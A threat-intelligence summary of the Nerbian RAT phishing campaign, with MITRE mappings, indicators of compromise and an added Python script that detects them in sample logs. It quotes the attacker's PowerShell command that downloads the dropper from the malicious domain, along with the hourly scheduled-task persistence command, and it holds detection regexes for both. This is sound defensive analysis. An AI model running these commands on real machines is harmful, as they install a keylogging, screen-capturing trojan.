Proofpoint profiles Nerbian RAT, a Go-based malware with aggressive anti-analysis and evasion capabilities that uses COVID-19 themes to lure victims. The attack chain starts with a maldoc phishing email, drops a Go-based loader UpdateUAV.exe, which then retrieves MoUsoCore.exe (the RAT) and establishes persistence via a scheduled task, with encrypted C2 communications.
#NerbianRAT #MoUsoCore #UpdateUAV #WorldHealthOrganization #FernandoTechnical
Keypoints
- Nerbian RAT is a multi-stage, OS-agnostic Go malware with substantial anti-analysis and anti-reversing capabilities spread across several components.
- The campaign uses maldoc phishing claiming to be WHO COVID-19 guidance, delivering a macro-enabled Word attachment.
- The dropper UpdateUAV.exe downloads the RAT payload MoUsoCore.exe and is UPX packed to reduce size.
- There are extensive anti-debug, anti-VM, and anti-forensics checks, including IsDebuggerPresent and VM/host checks, woven into the dropper.
- Nerbian RAT features encrypted configuration, keylogging, and screen capture, with C2 communications over SSL and structured POST data.
- Persistence is achieved via a scheduled task (MicrosoftMouseCoreWork) that starts the RAT hourly.
- IP/domain indicators include 185.121.139.249 and fernandestechnical.com with health_check.php, alongside various file hashes and filenames associated with the samples.
MITRE Techniques
- [T1566.001] Phishing – Malicious emails delivering a macro-laden Word attachment; ‘The emails claimed to be representing the World Health Organization (WHO) with important information regarding COVID-19.’
- [T1059.001] PowerShell – The macro leads to a PowerShell sequence including ‘powershell IWR -Uri hxxps://www[.]fernandestechnical[.]com/pub/media/gitlog -OutFile C:\Users\[username]\AppData\Roaming\UpdateUAV.exe’
- [T1105] Ingress Tool Transfer – The batch-driven IWR download and subsequent drop of UpdateUAV.exe onto the host; ‘It renames the downloaded file to UpdateUAV.exe, and drops it into: C:\Users\[current user]\AppData\Roaming\UpdateUAV.exe’
- [T1053.005] Scheduled Task – Establishment of a scheduled task named ‘MicrosoftMouseCoreWork’ to start the RAT hourly; ‘Next, the dropper will attempt to establish a scheduled task named MicrosoftMouseCoreWork to start the RAT payload hourly to establish persistence.’
- [T1027] Obfuscated/Compressed Files – The payload UpdateUAV.exe is UPX packed; ‘UPX packed. Unpacked, the file is 6.6MB in total.’
- [T1056.001] Keylogging – The RAT can log keystrokes and write encrypted data to rev.sav; ‘The RAT appears to have the ability to log keystrokes and appears to write them, encrypted, to the rev.sav file mentioned in the configuration settings above.’
- [T1113] Screen Capture – RAT uses Go libraries and a screenshot repository to enable screen capture; ‘This repo is a Go library for performing screen captures on a variety of different operating systems.’
Indicators of Compromise
- [Filename] IOCs – covid-19.doc and UpdateUAV.exe (from the indicators table for the maldoc and dropper)
- [MD5 Hash] IOCs – d7888fea6047b662a30bf00edac4c3ee, 9cca59eec5af63e42cd845b67cf6df89
- [SHA1 Hash] IOCs – 8137670512be55796f612e41602f505955b0bb0c, 178aad6c7918cc495a908944e79143a913630890
- [SHA256 Hash] IOCs – ee1bbd856bf72a79221baa0f7e97aafb6051129905d62d74a37ae7754fccc3db, 1b8c9e7c150bacd466fbe7f12b39883821f23b67cae0a427a57dc37e5ea4390f
- [Domain] IOCs – www.fernandestechnical.com
- [URL] IOCs – hxxps://www[.]fernandestechnical[.]com/pub/health_check.php
- [IP] IOCs – 185.121.139.249
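The following is an added detection example, not Proofpoint's code or any tooling from the report. It takes the indicators listed above plus the behaviours in the MITRE section (the IWR download into AppData\Roaming and the hourly MicrosoftMouseCoreWork task) and runs them over a handful of constructed, Sysmon-style log lines. The log format, the `Finding` type, the `scan_*` helpers and the regular expressions are all assumptions of this example; the page does not say which hash belongs to which file, so hashes are matched as one flat set.

```python
"""Added example: match Nerbian RAT indicators and behaviours against sample logs."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Set

# Indicators taken from the summary above. Hashes are kept in one set because
# the page does not map them to individual files.
NERBIAN_IOCS = {
    "filename": {"covid-19.doc", "updateuav.exe", "mousocore.exe", "rev.sav"},
    "hash": {
        "d7888fea6047b662a30bf00edac4c3ee", "9cca59eec5af63e42cd845b67cf6df89",  # MD5
        "8137670512be55796f612e41602f505955b0bb0c",                              # SHA1
        "178aad6c7918cc495a908944e79143a913630890",
        "ee1bbd856bf72a79221baa0f7e97aafb6051129905d62d74a37ae7754fccc3db",      # SHA256
        "1b8c9e7c150bacd466fbe7f12b39883821f23b67cae0a427a57dc37e5ea4390f",
    },
    "domain": {"fernandestechnical.com"},          # also covers the listed www. host
    "ip": {"185.121.139.249"},
    "url_path": {"/pub/health_check.php", "/pub/media/gitlog"},
}

# MD5 (32), SHA1 (40) or SHA256 (64) hex strings on word boundaries.
HASH_RE = re.compile(r"\b(?:[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})\b", re.I)

# Behavioural rules mirroring the MITRE mapping above; the regexes are this
# example's own, written from the quoted command lines, not from the report.
BEHAVIOUR_RULES = [
    ("T1059.001/T1105", "PowerShell IWR download written into AppData\\Roaming",
     re.compile(r"\b(iwr|invoke-webrequest)\b.*-outfile\b.*appdata\\roaming\\[^\s\\\"]+\.exe", re.I)),
    ("T1053.005", "scheduled task MicrosoftMouseCoreWork created",
     re.compile(r"\bschtasks\b.*/create\b.*/tn\s+microsoftmousecorework\b", re.I)),
    ("T1053.005", "hourly scheduled task running a binary from AppData\\Roaming (heuristic)",
     re.compile(r"\bschtasks\b.*/sc\s+hourly\b.*appdata\\roaming\\", re.I)),
]


@dataclass(frozen=True)
class Finding:
    line_no: int
    technique: str   # "IOC:<kind>" for atomic indicators, MITRE id for behaviours
    detail: str


def scan_line(line_no: int, line: str) -> List[Finding]:
    """Return every indicator or behaviour match found in one log line."""
    found: List[Finding] = []
    low = line.lower()
    for h in HASH_RE.findall(line):
        if h.lower() in NERBIAN_IOCS["hash"]:
            found.append(Finding(line_no, "IOC:hash", h.lower()))
    for kind in ("filename", "domain", "url_path"):
        for ioc in NERBIAN_IOCS[kind]:
            if ioc in low:
                found.append(Finding(line_no, f"IOC:{kind}", ioc))
    for ip in NERBIAN_IOCS["ip"]:
        # Guard against matching inside a longer dotted number.
        if re.search(r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])", line):
            found.append(Finding(line_no, "IOC:ip", ip))
    for technique, detail, rx in BEHAVIOUR_RULES:
        if rx.search(line):
            found.append(Finding(line_no, technique, detail))
    return found


def scan_logs(lines: Iterable[str]) -> List[Finding]:
    findings: List[Finding] = []
    for i, line in enumerate(lines):
        findings.extend(scan_line(i, line))
    return findings


def techniques_seen(findings: Iterable[Finding]) -> Set[str]:
    return {f.technique for f in findings}


def flagged_lines(findings: Iterable[Finding]) -> List[int]:
    return sorted({f.line_no for f in findings})


# Constructed sample lines (Sysmon-like fields and a proxy line); the user
# name, timestamps and the neutral attachment path are invented for the demo.
SAMPLE_LOGS = [
    r'2022-05-10T09:12:01 EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell IWR -Uri https://www.fernandestechnical.com/pub/media/gitlog -OutFile C:\Users\alice\AppData\Roaming\UpdateUAV.exe"',
    r'2022-05-10T09:12:03 EventID=11 TargetFilename=C:\Users\alice\AppData\Local\Temp\attachment.bin Hashes=SHA256=ee1bbd856bf72a79221baa0f7e97aafb6051129905d62d74a37ae7754fccc3db',
    r'2022-05-10T09:12:09 EventID=1 Image=C:\Windows\System32\schtasks.exe CommandLine="schtasks /create /tn MicrosoftMouseCoreWork /sc hourly /tr C:\Users\alice\AppData\Roaming\MoUsoCore.exe"',
    r'2022-05-10T09:13:00 EventID=3 Image=C:\Users\alice\AppData\Roaming\MoUsoCore.exe DestinationIp=185.121.139.249 DestinationPort=443',
    r'2022-05-10T09:13:02 proxy POST https://www.fernandestechnical.com/pub/health_check.php status=200',
    r'2022-05-10T09:14:00 EventID=1 Image=C:\Windows\System32\notepad.exe CommandLine="notepad.exe C:\Users\alice\notes.txt"',
]

FINDINGS = scan_logs(SAMPLE_LOGS)

if __name__ == "__main__":
    for f in FINDINGS:
        print(f"line {f.line_no}: {f.technique} -> {f.detail}")
```

The atomic indicators catch the dropper and RAT wherever they surface (file, DNS, proxy, network events), while the two behavioural rules give coverage that outlives a hash or domain change: a PowerShell `IWR ... -OutFile` landing an executable under AppData\Roaming, and `schtasks /create` with an hourly trigger pointing at that directory. The last rule is deliberately broader than the named task and will need tuning against a real baseline.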